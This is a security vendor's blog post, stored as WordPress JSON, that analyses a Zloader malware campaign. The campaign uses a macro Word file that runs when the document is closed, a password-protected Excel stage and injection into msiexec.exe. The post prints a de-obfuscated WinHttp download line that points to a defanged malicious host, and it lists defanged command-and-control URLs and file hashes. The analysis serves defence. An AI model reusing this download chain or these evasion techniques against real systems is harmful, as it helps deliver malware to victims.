{"id":89697,"date":"2021-03-23T19:25:38","date_gmt":"2021-03-23T13:55:38","guid":{"rendered":"https:\/\/blogs.quickheal.com\/?p=89697"},"modified":"2023-06-17T17:02:25","modified_gmt":"2023-06-17T11:32:25","slug":"zloader-entailing-different-office-files","status":"publish","type":"post","link":"https:\/\/www.quickheal.com\/blogs\/zloader-entailing-different-office-files\/","title":{"rendered":"Zloader: Entailing Different Office Files"},"content":{"rendered":"

Zloader aka Terdot – a variant of the infamous Zeus banking malware<\/a> is well known for aggressively using “.xls”, “.xlsx” documents as its initial vector to deliver its payload. Despite this, recently we have come across “.docm” file which is being used by Zoader family to perform its initial activity. This shows adversaries like to experiment with office documents to avoid being detected by security solutions.<\/p>\n

\"\"
\u00a0 \u00a0 \u00a0 \u00a0 Fig.1-Attack Chain<\/em><\/figcaption><\/figure>\n

Initial\u00a0Vector:<\/b><\/p>\n

Here infection chain starts with “.docm” file. Docm stands for “Macro-enabled office word document”. We can see below, the document view asking user to enable content.<\/p>\n

\"\"
\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Fig.2- Document View<\/em><\/figcaption><\/figure>\n

Like many other documents, we tried to observe its activity after enabling content but there was no activity in it. By\u00a0 looking at its VBA code, we got our answer. Enabling content will not do execution of macro. Here macro execution\u00a0 starts on \u201cDocument close\u201d as shown.<\/p>\n

\"\"
\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Fig.3- Macro Function Call<\/em><\/figcaption><\/figure>\n

As\u00a0soon\u00a0as\u00a0victim\u00a0close\u00a0this\u00a0document,\u00a0function\u00a0\u201cnnn\u201d\u00a0<\/i>gets called which is the main function of this VBA macro. In this, again sub functions\u00a0 are being called. Here adversaries also make use of \u201cUserform\u201d to perform next stage activity.<\/p>\n

\"\"
\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Fig.4- Sub Function Call<\/em><\/figcaption><\/figure>\n

UserForm_Initialize() function is used to invoke \u201cUserform2\u201d. Below image shows the userform2 object. In its dialog box, url data is\u00a0 chunked and overlapped on 25th ComboBox to hide actual data as shown below.<\/p>\n

\"\"
\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Fig.5- Hidden URL Data<\/em><\/figcaption><\/figure>\n

After going through all ComboBox of userform2, we were able to locate malicious url which is used to download 2nd stage payload.<\/p>\n

\"\"
\u00a0 \u00a0 \u00a0 \u00a0 \u00a0Fig.6- Chunked URL Data<\/em><\/figcaption><\/figure>\n

To sum up above activity, adversaries are making use of for loop to access all these values and create final url as shown\u00a0 below,<\/p>\n

\"\"
\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Fig.7- Creation of URL on Document Close<\/em><\/figcaption><\/figure>\n

Site\u00a0\u201chxxps[:]\/\/feelingfit-always[.]com\/1[.]php<\/i>\u201d which is malicious having score 11 on virus total, is used to download password protected XLS file. Its password is hidden again in VBA macro in “Userform1”. By exploring userform1 data,\u00a0 we were able to extract hidden password.<\/p>\n

\"\"
\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Fig.8- Macro Code to protect XLS with password<\/em><\/figcaption><\/figure>\n
\"\"
\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Fig.9- XLS Hidden Password<\/em><\/figcaption><\/figure>\n

2<\/b>nd<\/b>\u00a0Stage\u00a0Payload:<\/b><\/p>\n

Protecting document with password is classic technique to defend against AV vendors. Correct password is necessary to dig further into\u00a0 analysis. After matching above password, we can finally see excel workbook content. XLM macro is used in \u201cSheet3\u201d to perform further activity.<\/p>\n

\"\"
\u00a0 \u00a0 \u00a0 Fig.10- XLS Workbook<\/em><\/figcaption><\/figure>\n

Here code is embedded in different cells of document. Below figure shows the extracted macro code from above\u00a0 \u00a0workbook:<\/p>\n

\"\"
\u00a0 \u00a0 \u00a0 \u00a0 Fig.11- XLM Macro Code<\/em><\/figcaption><\/figure>\n

Here\u00a0adversaries\u00a0make\u00a0use\u00a0of\u00a0excel\u00a0inbuilt\u00a0functions\u00a0like\u00a0IIF\u00a0and\u00a0Switch\u00a0to\u00a0obfuscate\u00a0data.\u00a0Final\u00a0de-obfuscated\u00a0code\u00a0can\u00a0be\u00a0seen\u00a0as\u00a0below,<\/p>\n

\u00a0 \u00a0 \u00a0 \u00a0WinHttp.WinHttpRequest.5.1.open GET https[:]\/\/santarosafuneralhome[.]com\/2.php\u00a0 False<\/em><\/p>\n

\u00a0 \u00a0 \u00a0 \u00a0WinHttp.WinHttpRequest.5.1.SetRequestHeader<\/em><\/p>\n

\u00a0 \u00a0 \u00a0 \u00a0WinHttp.WinHttpRequest.5.1.send<\/em><\/p>\n

Above malicious url having virus total score 8 is used to download 3rd stage payload of this attack.<\/p>\n

Final\u00a0Payload\u00a0Analysis:<\/b><\/p>\n

The DLL is the final payload of Zloader. Here the DLL is highly obfuscated and avoids direct calls to the Windows APIs. Hashing is used to\u00a0 calculate the addresses and makes the call with the calculated values, making the reversing difficult.<\/p>\n

 <\/p>\n

\"\"
Fig.12 – Code for address calculation<\/figcaption><\/figure>\n

The\u00a0DLL\u00a0creates\u00a0process\u00a0\u2018msiexec.exe\u2019<\/i>,\u00a0which\u00a0is\u00a0a\u00a0genuine\u00a0<\/i>Microsoft process that belongs to Windows Component installer, in suspended\u00a0 mode and injects encrypted file to it.<\/p>\n

\"\"
\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Fig.13- ‘msiexec.exe’ created in suspended mode<\/em><\/figcaption><\/figure>\n
\"\"
\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Fig.14- Encrypted file injected in ‘msiexec.exe’<\/em><\/figcaption><\/figure>\n

It\u00a0also\u00a0injects\u00a0a\u00a0routine\u00a0that\u00a0will\u00a0decrypt\u00a0and\u00a0bring\u00a0the\u00a0malicious\u00a0PE\u00a0out\u00a0for\u00a0execution.<\/p>\n

\"\"
\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Fig.15- Decryption Routine<\/em><\/figcaption><\/figure>\n

With the setting of thread context, the initial execution point is passed and finally the injected code is executed with the resume thread.<\/p>\n

When\u00a0this\u00a0thread\u00a0of\u00a0msiexec.exe<\/i>\u00a0comes\u00a0into\u00a0execution,\u00a0it\u00a0tries\u00a0to\u00a0make\u00a0connection\u00a0to\u00a0its\u00a0CnC\u00a0servers\u00a0as\u00a0shown,<\/p>\n

\"\"<\/p>\n

 <\/p>\n

Since\u00a0these\u00a0urls\u00a0were\u00a0down\u00a0at\u00a0the\u00a0time\u00a0of\u00a0analysis,\u00a0we\u00a0were\u00a0not\u00a0able\u00a0to\u00a0go\u00a0further\u00a0deeper\u00a0into\u00a0it.<\/p>\n

Conclusion:<\/b><\/p>\n

This type of attack shows how adversaries innovate their mechanism to start infection chain to compromise victim. User should always be\u00a0 cautious while opening any office files. Quick Heal<\/a> and Seqrite enterprise security solutions<\/a> protect its customers from such files. So, remember to keep the endpoint security solutions always updated.<\/p>\n

IOCs:<\/strong><\/p>\n

DOCM:\u00a0117fafb46f27238351f2111e8f01416412044238d2f8378a285063eb9d4eef3d<\/p>\n

409ed829f19024045d26cc5d3a06e15a097605e13ba938875eca054a7a4a30b1<\/p>\n

91aa050536d834947709776af40c2fde49471d28231de50df0d324cd55101df4<\/p>\n

XLS:\u00a0\u00a0\u00a052d071922413a3be8815a76118a45bf13d8d323b73ba42377591fd68c59dfc89<\/p>\n

URL:<\/p>\n

https[:\/\/]tiodeitidampheater.tk\/post.php<\/p>\n

https[:\/\/]actes-etatcivil.com\/post.php<\/p>\n

https[:\/\/]ankarakreatif.com\/post.php<\/p>\n

https[:\/\/]www.ramazanyildiz.net\/post.php<\/p>\n

https[:\/\/]hispaniaeng.com\/post.php<\/p>\n

https[:\/\/]www.ifdd.francophonie.org\/post.php<\/p>\n

Subject\u00a0Matter\u00a0Expert:<\/strong><\/p>\n

Anjali Raut<\/p>\n

Priyanka Shinde<\/p>\n

 <\/p>\n

 <\/p>\n

 <\/p>\n","protected":false},"excerpt":{"rendered":"

Zloader aka Terdot – a variant of the infamous Zeus banking malware is well known for aggressively using “.xls”, “.xlsx” documents as its initial vector to deliver its payload. Despite this, recently we have come across “.docm” file which is being used by Zoader family to perform its initial activity. This shows adversaries like to […]<\/p>\n","protected":false},"author":62,"featured_media":89719,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[164,1739,303,5],"tags":[1239,317,1794],"class_list":["post-89697","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cyber-crime","category-cybersecurity","category-phishing","category-security","tag-cyber-security","tag-malware-attack","tag-zloader"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/89697"}],"collection":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/users\/62"}],"replies":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/comments?post=89697"}],"version-history":[{"count":40,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/89697\/revisions"}],"predecessor-version":[{"id":91514,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/89697\/revisions\/91514"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media\/89719"}],"wp:attachment":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media?parent=89697"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/categories?post=89697"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/tags?post=89697"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}